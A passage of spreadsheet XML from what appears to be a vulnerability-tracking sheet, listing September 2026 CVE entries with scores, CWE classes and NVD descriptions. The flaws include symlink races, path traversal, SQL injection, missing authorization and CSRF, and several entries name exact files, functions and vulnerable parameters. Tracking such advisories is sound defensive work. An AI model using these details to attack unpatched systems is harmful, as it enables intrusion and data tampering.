      <c r="K296" s="5" t="inlineStr"/>
      <c r="L296" s="5" t="inlineStr"/>
      <c r="M296" s="5" t="inlineStr"/>
      <c r="N296" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O296" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P296" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q296" s="5" t="inlineStr"/>
      <c r="R296" s="5" t="inlineStr">
        <is>
          <t>CWE-367, CWE-59</t>
        </is>
      </c>
      <c r="S296" s="5" t="inlineStr">
        <is>
          <t>mport is the MidnightBSD Package Manager. Prior to 2.7.8, do_actual_install() in libmport/bundle_read_install_pkg.c used path-based lstat(), chown(), stat(), and chmod() operations while installing package files. A local attacker with write access to a target directory could replace a checked file with a symlink before privileged ownership or mode changes were applied, redirecting those changes to an attacker-selected path and compromising filesystem integrity or permissions. This issue is fixed in version 2.7.8.</t>
        </is>
      </c>
      <c r="T296" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54576</t>
        </is>
      </c>
    </row>
    <row r="297">
      <c r="A297" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B297" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C297" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54587</t>
        </is>
      </c>
      <c r="D297" s="5" t="n">
        <v>5.8</v>
      </c>
      <c r="E297" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F297" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G297" s="5" t="inlineStr"/>
      <c r="H297" s="5" t="inlineStr"/>
      <c r="I297" s="5" t="inlineStr"/>
      <c r="J297" s="5" t="inlineStr"/>
      <c r="K297" s="5" t="inlineStr"/>
      <c r="L297" s="5" t="inlineStr"/>
      <c r="M297" s="5" t="inlineStr"/>
      <c r="N297" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O297" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P297" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q297" s="5" t="inlineStr"/>
      <c r="R297" s="5" t="inlineStr">
        <is>
          <t>CWE-367, CWE-59</t>
        </is>
      </c>
      <c r="S297" s="5" t="inlineStr">
        <is>
          <t>mport is the MidnightBSD Package Manager. Prior to 2.7.8, directory assets handled as ASSET_DIR or ASSET_DIR_OWNER_MODE in libmport/bundle_read_install_pkg.c used path-based mport_mkdirp(), ownership, and permission operations. A local attacker able to modify part of the target installation tree could use dot-dot traversal or substitute symlinks during privileged package installation, causing directory creation or attribute changes to affect attacker-selected paths outside the intended package directories. This issue is fixed in version 2.7.8.</t>
        </is>
      </c>
      <c r="T297" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54587</t>
        </is>
      </c>
    </row>
    <row r="298">
      <c r="A298" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B298" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C298" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81479</t>
        </is>
      </c>
      <c r="D298" s="5" t="n">
        <v>5.8</v>
      </c>
      <c r="E298" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F298" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G298" s="5" t="inlineStr"/>
      <c r="H298" s="5" t="inlineStr"/>
      <c r="I298" s="5" t="inlineStr"/>
      <c r="J298" s="5" t="inlineStr"/>
      <c r="K298" s="5" t="inlineStr"/>
      <c r="L298" s="5" t="inlineStr"/>
      <c r="M298" s="5" t="inlineStr"/>
      <c r="N298" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O298" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P298" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q298" s="5" t="inlineStr"/>
      <c r="R298" s="5" t="inlineStr">
        <is>
          <t>CWE-187</t>
        </is>
      </c>
      <c r="S298" s="5" t="inlineStr">
        <is>
          <t>Dell OpenManage Server Administrator, versions prior to 11.1.0.3, contains a Partial String Comparison vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Denial of service.</t>
        </is>
      </c>
      <c r="T298" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81479</t>
        </is>
      </c>
    </row>
    <row r="299">
      <c r="A299" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B299" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C299" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92933</t>
        </is>
      </c>
      <c r="D299" s="5" t="n">
        <v>5.8</v>
      </c>
      <c r="E299" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F299" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G299" s="5" t="inlineStr"/>
      <c r="H299" s="5" t="inlineStr"/>
      <c r="I299" s="5" t="inlineStr"/>
      <c r="J299" s="5" t="inlineStr"/>
      <c r="K299" s="5" t="inlineStr"/>
      <c r="L299" s="5" t="inlineStr"/>
      <c r="M299" s="5" t="inlineStr"/>
      <c r="N299" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O299" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P299" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q299" s="5" t="inlineStr"/>
      <c r="R299" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S299" s="5" t="inlineStr">
        <is>
          <t>vm2 is a sandbox for running untrusted Node.js code. In versions &lt;= 3.11.7, NodeVM exposes the host `util` module to the sandbox as an unfiltered shallow copy (`Object.assign({}, util)` in `defaultBuiltinLoaderUtil`), and the deprecated `sys` builtin (an alias of host `util`) is exposed through the generic builtin loader. On Node.js &gt;= 22.9 this hands sandboxed code `util.getCallSites()`, a programmatic stack-introspection API that returns the host process's full call stack, including absolute file paths, function names, and line numbers for vm2 bridge internals and the embedding application's entrypoint. This bypasses the host-frame redaction introduced for GHSA-v27g-jcqj-v8rw, which only applies to the `Error.prepareStackTrace` formatting channel. The issue is fixed in vm2 3.11.8.</t>
        </is>
      </c>
      <c r="T299" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92933</t>
        </is>
      </c>
    </row>
    <row r="300">
      <c r="A300" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B300" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C300" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44940</t>
        </is>
      </c>
      <c r="D300" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="E300" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F300" s="5" t="inlineStr">
        <is>
          <t>meissner@suse.de</t>
        </is>
      </c>
      <c r="G300" s="5" t="inlineStr"/>
      <c r="H300" s="5" t="inlineStr"/>
      <c r="I300" s="5" t="inlineStr"/>
      <c r="J300" s="5" t="inlineStr"/>
      <c r="K300" s="5" t="inlineStr"/>
      <c r="L300" s="5" t="inlineStr"/>
      <c r="M300" s="5" t="inlineStr"/>
      <c r="N300" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O300" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P300" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q300" s="5" t="inlineStr"/>
      <c r="R300" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-312</t>
        </is>
      </c>
      <c r="S300" s="5" t="inlineStr">
        <is>
          <t>The rancher-extension-stackstate extension in SUSE Observability exposes service tokens in plain configuration or insecure locations rather than managing them securely. An attacker with minimal access could obtain the token to gain unauthorized access or escalate privileges within the observability environment.</t>
        </is>
      </c>
      <c r="T300" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44940</t>
        </is>
      </c>
    </row>
    <row r="301">
      <c r="A301" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B301" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C301" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92758</t>
        </is>
      </c>
      <c r="D301" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="E301" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F301" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G301" s="5" t="inlineStr"/>
      <c r="H301" s="5" t="inlineStr"/>
      <c r="I301" s="5" t="inlineStr"/>
      <c r="J301" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K301" s="5" t="inlineStr"/>
      <c r="L301" s="5" t="inlineStr"/>
      <c r="M301" s="5" t="inlineStr"/>
      <c r="N301" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O301" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P301" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q301" s="5" t="inlineStr"/>
      <c r="R301" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="S301" s="5" t="inlineStr">
        <is>
          <t>If logging mode is set to DEBUG or a malformed MongoDB connection string is used, application logs may collect sensitive information (if in use) such as passwords and AWS secure access keys.</t>
        </is>
      </c>
      <c r="T301" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92758</t>
        </is>
      </c>
    </row>
    <row r="302">
      <c r="A302" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B302" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C302" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50291</t>
        </is>
      </c>
      <c r="D302" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E302" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F302" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G302" s="5" t="inlineStr"/>
      <c r="H302" s="5" t="inlineStr"/>
      <c r="I302" s="5" t="inlineStr"/>
      <c r="J302" s="5" t="inlineStr"/>
      <c r="K302" s="5" t="inlineStr"/>
      <c r="L302" s="5" t="inlineStr"/>
      <c r="M302" s="5" t="inlineStr"/>
      <c r="N302" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O302" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P302" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q302" s="5" t="inlineStr"/>
      <c r="R302" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S302" s="5" t="inlineStr">
        <is>
          <t>OpenImageIO is a toolset for reading, writing, and manipulating image files of any image file format relevant to VFX / animation. Prior to versions 3.0.16.0 and 3.1.11.0, processing a crafted BMP file through oiiotool or an application linked to OpenImageIO can reach BMP palette handling in src/bmp.imageio/bmpinput.cpp with an empty color table. BmpInput::read_native_scanline then performs an invalid palette read while decoding an RLE-compressed scanline, causing a process crash and denial of service. This issue is fixed in versions 3.0.16.0 and 3.1.11.0.</t>
        </is>
      </c>
      <c r="T302" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50291</t>
        </is>
      </c>
    </row>
    <row r="303">
      <c r="A303" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B303" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C303" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76781</t>
        </is>
      </c>
      <c r="D303" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E303" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F303" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G303" s="5" t="inlineStr"/>
      <c r="H303" s="5" t="inlineStr"/>
      <c r="I303" s="5" t="inlineStr"/>
      <c r="J303" s="5" t="inlineStr"/>
      <c r="K303" s="5" t="inlineStr"/>
      <c r="L303" s="5" t="inlineStr"/>
      <c r="M303" s="5" t="inlineStr"/>
      <c r="N303" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O303" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P303" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q303" s="5" t="inlineStr"/>
      <c r="R303" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="S303" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in libxml2. A local user or an attacker providing a specially crafted XML catalog can trigger a NULL pointer dereference during XML catalog parsing. This occurs when a `nextCatalog` element lacks its mandatory `catalog` attribute, leading to the application crashing and causing a Denial of Service (DoS).</t>
        </is>
      </c>
      <c r="T303" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76781</t>
        </is>
      </c>
    </row>
    <row r="304">
      <c r="A304" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B304" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C304" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92926</t>
        </is>
      </c>
      <c r="D304" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E304" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F304" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G304" s="5" t="inlineStr"/>
      <c r="H304" s="5" t="inlineStr"/>
      <c r="I304" s="5" t="inlineStr"/>
      <c r="J304" s="5" t="inlineStr"/>
      <c r="K304" s="5" t="inlineStr"/>
      <c r="L304" s="5" t="inlineStr"/>
      <c r="M304" s="5" t="inlineStr"/>
      <c r="N304" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O304" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P304" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q304" s="5" t="inlineStr"/>
      <c r="R304" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S304" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in code-projects Matrimonial System 1.0. This vulnerability affects the function writepartnerprefs of the file /partner_preference.php. Such manipulation of the argument education leads to sql injection. The attack can be executed remotely. The exploit has been disclosed to the public and may be used.</t>
        </is>
      </c>
      <c r="T304" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92926</t>
        </is>
      </c>
    </row>
    <row r="305">
      <c r="A305" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B305" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C305" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14311</t>
        </is>
      </c>
      <c r="D305" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E305" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F305" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G305" s="5" t="inlineStr"/>
      <c r="H305" s="5" t="inlineStr"/>
      <c r="I305" s="5" t="inlineStr"/>
      <c r="J305" s="5" t="inlineStr"/>
      <c r="K305" s="5" t="inlineStr"/>
      <c r="L305" s="5" t="inlineStr"/>
      <c r="M305" s="5" t="inlineStr"/>
      <c r="N305" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O305" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P305" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q305" s="5" t="inlineStr"/>
      <c r="R305" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S305" s="5" t="inlineStr">
        <is>
          <t>The Booking for Appointments and Events Calendar – Amelia plugin for WordPress is vulnerable to unauthorized access and modification of data due to a missing ownership verification on /users/customers/&lt;id&gt; endpoint  in all versions up to, and including, 2.4.4. This makes it possible for authenticated attackers, with wpamelia-provider role, to view and modify arbitrary customers, including password reset. Takeover of WordPress user accounts, with the roles up to Editor, is also possible if that user had made an Amelia booking. This vulnerability affects only the Premium version of the plugin, where the Employee Panel is present.</t>
        </is>
      </c>
      <c r="T305" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14311</t>
        </is>
      </c>
    </row>
    <row r="306">
      <c r="A306" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B306" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C306" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54613</t>
        </is>
      </c>
      <c r="D306" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E306" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F306" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G306" s="5" t="inlineStr"/>
      <c r="H306" s="5" t="inlineStr"/>
      <c r="I306" s="5" t="inlineStr"/>
      <c r="J306" s="5" t="inlineStr"/>
      <c r="K306" s="5" t="inlineStr"/>
      <c r="L306" s="5" t="inlineStr"/>
      <c r="M306" s="5" t="inlineStr"/>
      <c r="N306" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O306" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P306" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q306" s="5" t="inlineStr"/>
      <c r="R306" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S306" s="5" t="inlineStr">
        <is>
          <t>Vvveb is a powerful and easy to use CMS with page builder to build websites, blogs or ecommerce stores. Prior to 1.0.8.5, getThemeFolder() in admin/controller/editor/revisions.php returns the attacker-controlled theme parameter without sanitization, and backupFolder() concatenates it beneath DIR_THEMES before editor/revisions/load or editor/revisions/delete operates on a named .html file. sanitizeBackupFileName() strips traversal characters only from the separate file parameter and does not protect the theme directory component. An authenticated user with the default Editor role and editor/* permission can submit traversal sequences that redirect file_get_contents() or unlink() to a reachable backup subdirectory outside the web root. A valid admin session and CSRF token are required, the read is limited to .html files in backup directories, and deletion additionally requires filesystem write permission. This can disclose sensitive exported site content or remove backup data. This issue is fixed in version 1.0.8.5.</t>
        </is>
      </c>
      <c r="T306" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54613</t>
        </is>
      </c>
    </row>
    <row r="307">
      <c r="A307" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B307" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C307" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54643</t>
        </is>
      </c>
      <c r="D307" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E307" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F307" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G307" s="5" t="inlineStr"/>
      <c r="H307" s="5" t="inlineStr"/>
      <c r="I307" s="5" t="inlineStr"/>
      <c r="J307" s="5" t="inlineStr"/>
      <c r="K307" s="5" t="inlineStr"/>
      <c r="L307" s="5" t="inlineStr"/>
      <c r="M307" s="5" t="inlineStr"/>
      <c r="N307" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O307" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P307" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q307" s="5" t="inlineStr"/>
      <c r="R307" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S307" s="5" t="inlineStr">
        <is>
          <t>CubeCart is an ecommerce software solution. Prior to 6.7.5, the delete-note handler in admin/sources/orders.index.inc.php verifies only the presence of order_id and delete-note parameters before deleting records from CubeCart_order_notes, without requiring CC_PERM_DELETE for orders. An authenticated administrator lacking order modification privileges can directly invoke the handler with valid identifiers and delete order-history notes, removing operational records and audit-trail data. This issue is fixed in version 6.7.5.</t>
        </is>
      </c>
      <c r="T307" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54643</t>
        </is>
      </c>
    </row>
    <row r="308">
      <c r="A308" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B308" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C308" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73999</t>
        </is>
      </c>
      <c r="D308" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E308" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F308" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G308" s="5" t="inlineStr"/>
      <c r="H308" s="5" t="inlineStr"/>
      <c r="I308" s="5" t="inlineStr"/>
      <c r="J308" s="5" t="inlineStr"/>
      <c r="K308" s="5" t="inlineStr"/>
      <c r="L308" s="5" t="inlineStr"/>
      <c r="M308" s="5" t="inlineStr"/>
      <c r="N308" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O308" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P308" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q308" s="5" t="inlineStr"/>
      <c r="R308" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S308" s="5" t="inlineStr">
        <is>
          <t>Contributor Insecure Direct Object References (IDOR) in Cooked &lt;= 1.16.0 versions.</t>
        </is>
      </c>
      <c r="T308" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73999</t>
        </is>
      </c>
    </row>
    <row r="309">
      <c r="A309" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B309" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C309" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74005</t>
        </is>
      </c>
      <c r="D309" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E309" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F309" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G309" s="5" t="inlineStr"/>
      <c r="H309" s="5" t="inlineStr"/>
      <c r="I309" s="5" t="inlineStr"/>
      <c r="J309" s="5" t="inlineStr"/>
      <c r="K309" s="5" t="inlineStr"/>
      <c r="L309" s="5" t="inlineStr"/>
      <c r="M309" s="5" t="inlineStr"/>
      <c r="N309" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O309" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P309" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q309" s="5" t="inlineStr"/>
      <c r="R309" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="S309" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Request Forgery (CSRF) in PublishPress Series &lt;= 3.1.3 versions.</t>
        </is>
      </c>
      <c r="T309" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74005</t>
        </is>
      </c>
    </row>
    <row r="310">
      <c r="A310" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B310" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C310" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80355</t>
        </is>
      </c>
      <c r="D310" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E310" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F310" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G310" s="5" t="inlineStr"/>
      <c r="H310" s="5" t="inlineStr"/>
      <c r="I310" s="5" t="inlineStr"/>
      <c r="J310" s="5" t="inlineStr"/>
      <c r="K310" s="5" t="inlineStr"/>
      <c r="L310" s="5" t="inlineStr"/>
      <c r="M310" s="5" t="inlineStr"/>
      <c r="N310" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O310" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P310" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q310" s="5" t="inlineStr"/>
      <c r="R310" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="S310" s="5" t="inlineStr">
        <is>
          <t>Dell OpenManage Server Administrator, versions prior to 11.1.0.3, contains a Cross-Site Request Forgery (CSRF) vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Remote execution.</t>
        </is>
      </c>
      <c r="T310" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80355</t>
        </is>
      </c>
    </row>
    <row r="311">
      <c r="A311" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B311" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C311" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16582</t>
        </is>
      </c>
      <c r="D311" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E311" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F311" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G311" s="5" t="inlineStr"/>
      <c r="H311" s="5" t="inlineStr"/>
      <c r="I311" s="5" t="inlineStr"/>
      <c r="J311" s="5" t="inlineStr"/>
      <c r="K311" s="5" t="inlineStr"/>
      <c r="L311" s="5" t="inlineStr"/>
      <c r="M311" s="5" t="inlineStr"/>
      <c r="N311" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O311" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P311" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q311" s="5" t="inlineStr"/>
      <c r="R311" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S311" s="5" t="inlineStr">
        <is>
          <t>The Booking for Appointments and Events Calendar – Amelia plugin for WordPress is vulnerable to unauthorized modification of data in all versions up to, and including, 2.4.5. This is due to the plugin accepting a client-supplied package-redemption identifier as proof of payment without validating it. This makes it possible for unauthenticated attackers to create approved appointment bookings without completing payment</t>
        </is>
      </c>
      <c r="T311" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16582</t>
        </is>
      </c>
    </row>
    <row r="312">
      <c r="A312" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B312" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C312" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16750</t>
        </is>
      </c>
      <c r="D312" s="5" t="n">
        <v>5.3</v>
      </c>
